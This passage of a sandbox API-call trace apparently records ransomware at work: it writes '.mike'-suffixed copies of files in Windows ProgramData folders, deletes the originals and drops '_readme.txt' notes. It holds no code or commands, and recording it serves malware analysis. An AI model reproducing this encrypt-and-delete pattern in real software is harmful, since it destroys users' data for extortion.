"c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db")) returned 0 [0138.886] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", lpFilePart=0x0) returned 0x6e [0138.886] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", lpFilePart=0x0) returned 0x6e [0138.886] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db.mike")) returned 1 [0138.888] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", lpFilePart=0x0) returned 0x69 [0138.888] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.888] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.889] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", lpFilePart=0x0) returned 0x69 [0138.889] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.924] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.924] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.925] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", dwFileAttributes=0x80) returned 1 [0138.925] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", lpFilePart=0x0) returned 0x69 [0138.925] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")) returned 0 [0138.926] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.927] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.927] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.mike" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db.mike")) returned 1 [0138.930] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.930] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.930] CoTaskMemFree (pv=0x4e1c10) [0138.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.930] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore", lpFilePart=0x0) returned 0x34 [0138.931] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.931] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.931] CoTaskMemFree (pv=0x4e1c10) [0138.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.931] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US", lpFilePart=0x0) returned 0x3a [0138.931] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.931] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.931] CoTaskMemFree (pv=0x4e1c10) [0138.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.932] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\DRM", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\DRM", lpFilePart=0x0) returned 0x24 [0138.933] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.933] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.933] CoTaskMemFree (pv=0x4e1c10) [0138.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.933] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\DRM\\Cache", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\DRM\\Cache", lpFilePart=0x0) returned 0x2a [0138.934] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.934] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.934] CoTaskMemFree (pv=0x4e1c10) [0138.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.934] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\GameExplorer", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\GameExplorer", lpFilePart=0x0) returned 0x2d [0138.934] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.934] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.934] CoTaskMemFree (pv=0x4e1c10) [0138.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.935] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics", lpFilePart=0x0) returned 0x3d [0138.938] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.939] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", lpFilePart=0x0) returned 0x5f [0138.939] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml", lpFilePart=0x0) returned 0x5a [0138.939] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", lpFilePart=0x0) returned 0x5f [0138.945] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", lpFilePart=0x0) returned 0x5f [0138.946] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml.mike", lpFilePart=0x0) returned 0x5f [0138.946] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml", dwFileAttributes=0x80) returned 1 [0138.946] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml", lpFilePart=0x0) returned 0x5a [0138.946] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-12.xml")) returned 1 [0138.947] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-12.xml", lpFilePart=0x0) returned 0x5a [0138.948] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", lpFilePart=0x0) returned 0x49 [0138.949] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.949] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", lpFilePart=0x0) returned 0x5f [0138.950] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", lpFilePart=0x0) returned 0x5a [0138.950] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", lpFilePart=0x0) returned 0x5f [0138.956] WriteFile (in: hFile=0x280, lpBuffer=0x2273058*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2273058*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.956] CloseHandle (hObject=0x280) returned 1 [0138.956] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", lpFilePart=0x0) returned 0x5a [0138.957] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", lpFilePart=0x0) returned 0x5f [0138.957] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml.mike", lpFilePart=0x0) returned 0x5f [0138.957] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", dwFileAttributes=0x80) returned 1 [0138.957] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", lpFilePart=0x0) returned 0x5a [0138.957] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-26.xml")) returned 1 [0138.958] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml", lpFilePart=0x0) returned 0x5a [0138.959] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", lpFilePart=0x0) returned 0x49 [0138.961] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.962] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", lpFilePart=0x0) returned 0x5b [0138.962] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", lpFilePart=0x0) returned 0x56 [0138.962] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", lpFilePart=0x0) returned 0x5b [0138.967] WriteFile (in: hFile=0x280, lpBuffer=0x229c618*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x229c618*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.967] CloseHandle (hObject=0x280) returned 1 [0138.967] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", lpFilePart=0x0) returned 0x56 [0138.967] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", lpFilePart=0x0) returned 0x5b [0138.968] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.mike", lpFilePart=0x0) returned 0x5b [0138.968] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", dwFileAttributes=0x80) returned 1 [0138.968] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", lpFilePart=0x0) returned 0x56 [0138.968] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-latest.xml")) returned 1 [0138.970] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml", lpFilePart=0x0) returned 0x56 [0138.971] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", lpFilePart=0x0) returned 0x49 [0138.973] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.973] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", lpFilePart=0x0) returned 0x55 [0138.973] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", lpFilePart=0x0) returned 0x50 [0138.973] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", lpFilePart=0x0) returned 0x55 [0138.979] WriteFile (in: hFile=0x280, lpBuffer=0x22bd4cc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x22bd4cc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.979] CloseHandle (hObject=0x280) returned 1 [0138.979] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", lpFilePart=0x0) returned 0x50 [0138.979] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", lpFilePart=0x0) returned 0x55 [0138.979] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.mike", lpFilePart=0x0) returned 0x55 [0138.980] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", dwFileAttributes=0x80) returned 1 [0138.980] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", lpFilePart=0x0) returned 0x50 [0138.980] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html")) returned 1 [0138.981] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", lpFilePart=0x0) returned 0x50 [0138.981] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", lpFilePart=0x0) returned 0x49 [0138.983] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.983] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.983] CoTaskMemFree (pv=0x4e1c10) [0138.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", 